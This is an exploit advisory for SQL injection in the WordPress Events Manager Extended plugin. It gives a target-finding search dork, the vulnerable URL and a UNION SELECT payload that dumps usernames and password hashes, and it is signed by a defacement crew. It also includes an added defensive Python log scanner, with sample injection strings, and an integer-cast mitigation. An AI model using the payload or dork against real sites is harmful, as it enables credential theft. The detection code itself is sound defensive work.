WordPress Events Manager Extended Plugin SQL Injection Vulnerability

2011-06-11 13:15:10

------------------------------------------------------------------------
# WordPress Events Manager Extended Plugin Persistent SQL Vulnerability
------------------------------------------------------------------------

# SoftwareLink: http://wordpress.org/extend/plugins/events-manager-extended/
# Version : 3.1.2
# Author : LoocK3D
# Date : 11 June, 2011
------------------------------------------------------------------------

[-] Dork ; inurl:wp-admin/admin.php?page=
[-] Vulnerable File ; /wp-admin/admin.php?page=people&action=printable&event_id=[SQL]
[-] Exploit ; -1+union+select+0,1,2,concat_ws(user_login,0x3a,user_pass)UAHCrew,4+from+wp_users--
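
Added example (not part of the original advisory): a log check that flags requests to the printable people view whose event_id is not a plain integer, which is the parameter the advisory reports as injectable. It assumes a combined-format access log that records the query string; the sample lines and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit
# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [11/Jun/2011:13:02:11 +0000] "GET /wp-admin/admin.php?page=people&action=printable&event_id=12 HTTP/1.1" 200 5120
203.0.113.9 - - [11/Jun/2011:13:04:40 +0000] "GET /wp-admin/admin.php?page=people&action=printable&event_id=-1+union+select+0,1,2,3,4+from+wp_users-- HTTP/1.1" 200 734
203.0.113.9 - - [11/Jun/2011:13:04:52 +0000] "GET /wp-admin/admin.php?page=people&action=printable&event_id=-1%2520UNION%2520SELECT%25201 HTTP/1.1" 200 611
198.51.100.7 - - [11/Jun/2011:13:06:01 +0000] "GET /wp-admin/admin.php?page=events&event_id=7 HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded input is compared in clear form."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_event_id(target):
    """Return the decoded event_id if the printable view got a non-integer id, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if params.get("page") != ["people"] or params.get("action") != ["printable"]:
        return None
    for raw in params.get("event_id", []):
        value = fully_decode(raw)
        if not re.fullmatch(r"\d+", value):  # a legitimate id is digits only
            return value
    return None

def scan(log_text):
    """Return (client_ip, decoded_event_id) for every flagged request line."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if match:
            value = suspicious_event_id(match.group(2))
            if value is not None:
                hits.append((match.group(1), value))
    return hits

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(client, repr(value))
```

The same digits-only rule is the server-side mitigation: casting event_id to an integer (or binding it as a numeric parameter) before it reaches the query removes the injection point.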



------------------------------------------------------------------------

# UAHCrew Member : Hackeri-AL - LoocK3D - b4cKd00r ~
# Deface Archive : http://zone-h.org/archive/notifier=UAH-Crew
# UAHCrew : [email protected]
# LoocK3D : [email protected]

------------------------------------------------------------------------

Fixes

No fixes
